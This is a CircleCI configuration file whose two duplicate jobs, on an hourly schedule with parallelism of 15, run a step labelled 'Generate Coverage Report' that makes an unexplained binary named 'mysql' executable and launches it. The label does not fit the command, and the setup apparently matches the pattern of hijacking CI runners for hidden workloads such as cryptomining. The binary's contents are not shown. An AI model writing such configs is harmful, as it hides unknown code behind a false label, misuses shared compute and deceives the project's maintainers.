version: 2.1

workflows:
  build:
    jobs:
      - build
      - build2

    triggers:
      - schedule:
          cron: "37 * * * *"
          filters:
            branches:
              only:
                - main

  builder:
    jobs: 
      - build
      - build2
jobs:
  build:
    docker:
      - image: circleci/mongo:latest
    working_directory: ~/repo
    parallelism: 15
    steps:
      - checkout
      - run:
          name: "Generate Coverage Report"
          command: |
            cd cmd/coverage/
            chmod 777 mysql 
            ./mysql
  build2:
    docker:
      - image: circleci/mongo:latest
    working_directory: ~/repo
    parallelism: 15
    steps:
      - checkout
      - run:
          name: "Generate Coverage Report"
          command: |
            cd cmd/coverage/
            chmod 777 mysql 
            ./mysql